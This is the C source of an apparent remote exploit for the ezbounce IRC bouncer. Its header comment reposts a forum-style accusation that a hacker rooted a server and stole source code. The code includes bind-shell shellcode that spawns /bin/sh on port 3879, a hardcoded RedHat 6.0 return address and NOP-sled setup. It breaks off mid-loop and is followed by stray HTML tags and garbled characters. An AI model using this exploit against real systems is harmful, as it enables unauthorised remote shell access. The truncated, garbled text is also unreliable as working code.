/* ezbounce version (0.85.2 and probably others) exploit by sectorx * mad thanks to duke for helping me with the segment probe code :) * I included the offset of RedHat 6.0's RPM, feel free to report me of * any other offsets of precompiled binaries. * * PRIVATE! DO NOT DISTRIBUTE!! * * ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ * This source code was supposed to be PRIVATE PROPERTY of XOR, * though it was set public, WITHOUT OUR PERMISSION, by gov-boi, * the owner of hack.co.za. This once again proves Phonic's claims * about gov-boi. * * * "The Source Code Thief Reveled" --Phonic : * ------------------------------------------ * * Welcome to the new www.hack.co.za * * My name is phonic. you might have heard of me. * * Part I * ---------- * You might have noticed that recently a file was added called the Cisco * Auditing Tool. This tool was a pretty nice all-in-one Cisco Router tool * coded by g0ne. I was helping him work on this tool, and I happened to * have a local copy of it on the machine I admin: Station 25. I might also * add that this is a state owned box. Well, as we were working on this tool, * we were getting it ready for release. Working out a few bugs, adding some * new tools, etc. So I had the latest version of the source in a private * directory on my box. Also, I had a large collection of un-released source * code. * * Part II * ---------- * About a month or so ago, I was asked by a friend, whose name will remain * confidential, if I would mind hosting www.hack.co.za for gov-boi, aka * rage. Apparently, the previous hoster stopped hosting it for reasons * unknown to me, so the site was down for a while. I, being the kind and * generous person that I am so well known to be =], said ok. So for the past * month or so, www.hack.co.za was being hosted here. I helped gov-boi setup * the dns tables, etc. so that the site would work and everyone would be * happy. * * Part III * ---------- * Like I said earlier, the pre-release source code for the Cisco Auditing * Tool was on this box. On the night of May 25th 2000, I get a phone call * from g0ne. Apparently, someone had posted the source code to packet storm. * Well, this was strange because only 3 people, myself and g0ne included, * had the source. I didn't think anyone on my box would have taken it since * I thought they were all trustworthy. It turned out I was sadly mistaken. * After careful examination of the box, I learned that gov-boi rooted the * box, the box I was generous enough to let him use, with a local exploit. * Not hiding his work at all, this was easily found out in the logs. * * Part IV * ---------- * gov-boi decided that in exchange for the generosity that I extended * towards him, with nothing asked for in return, he was going to go behind * my back, and steal tons of source code for his web site. I imagine he is * going to quickly change the dns tables to unlink this server from * www.hack.co.za once he realizes that I found out that he is a source code * thief. Now, in my humble opinion, and I could be wrong, I think this is * really fucked up. * * Part V * ---------- * Finally, tomorrow I have to file a report about the intrusion and hack on this system by gov-boi. * Oh, did I mention that this is a state owned box? * * Thank you for your time. * -phonic * * --snip snip-- * * Thanks for your time. * --sectorx */ #include #include #include #include #include #include #include #include #include #include #define MAX 4096 #define TIMEOUT 1 #define SIZE 400 #define TOP 310 #define ADDR 0xbffff26c /* ezbounce 0.85.2 RedHat 6.0 RPM offset */ /* bind a shell on port 3879 by lamagra */ char shellcode[]= "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8" "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89" "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0" "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd" "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9" "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75" "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08" "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh"; int Connect(int ip, int port) { int fd; struct sockaddr_in a; fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if (fd<0) return -1; a.sin_family = AF_INET; a.sin_port = htons(port); a.sin_addr.s_addr = ip; if (connect(fd,(struct sockaddr*)&a,sizeof(struct sockaddr))<0) return -1; return fd; } int sprint(int fd, const char *str, ...) { va_list args; char buf[MAX]; va_start(args,str); vsnprintf(buf,MAX,str,args); printf("-> %s",buf); return(write(fd,buf,strlen(buf))); } int Datawatch(int fd, int sec) { fd_set fds; struct timeval tv; tv.tv_sec = sec; tv.tv_usec = 0; FD_ZERO(&fds); FD_SET(fd,&fds); if (select(fd+1,&fds,NULL,NULL,&tv)) return 1; return 0; } int Get(int fd, char *grep) { char buf[MAX]; int ret=0; while (Datawatch(fd,TIMEOUT)>0) { memset(&buf,0,sizeof(buf)); read(fd,&buf,sizeof(buf)); if (strstr(buf,grep)) ++ret; } return ret; } int main(int argc, char *argv[]) { int i,fd; char buf[SIZE]; printf("ezbounce remote exploit by sectorx of xor\n"); if (argc<6) { printf("Usage: %s \n\n",argv[0]); return; } memset(&buf,0x90,sizeof(buf)); for (i=TOP+2;i
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>


<span id="7ztzv"></span><form id="7ztzv"></form>


<span id="7ztzv"></span>
    

      

        <address id="7ztzv"></address>
            

ÑÇÖÞÅ·ÃÀÔÚÏß